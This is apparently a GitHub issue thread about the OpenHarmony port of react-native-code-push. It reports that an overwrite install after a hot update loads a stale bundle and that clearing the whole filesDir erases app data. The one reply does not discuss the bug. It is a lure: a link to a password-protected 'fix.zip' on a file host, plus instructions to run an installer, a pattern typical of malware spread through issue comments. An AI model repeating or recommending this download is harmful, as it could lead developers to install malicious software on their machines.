### ISSUE TITLE
本地已热更新版本，覆盖安装不同版本应用时，加载的bundle不对

### ISSUE THREAD

**Issue by dream-approaching** [react-native-oh-library/react-native-code-push#27]
### 描述 / Description

1、热更新完成后全量覆盖安装第一次打开App加载bundle不对，现加载的未老的热更新bundle
2、删除太多， 把整个filesDir都删了导致App存储的一些数据也丢失了

https://issuereporter.developer.huawei.com/detail/240824191009042/comment

### 库版本 / Library version

8.2.2-0.0.7

### React Native OpenHarmony version

0.72.28

### 构建类型 / Build type

Debug app & dev bundle

### 设备 / Device

Real device

### 设备版本 / Device model

NEXT.0.0.60

### 已悉知 / Acknowledgements

Yes

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
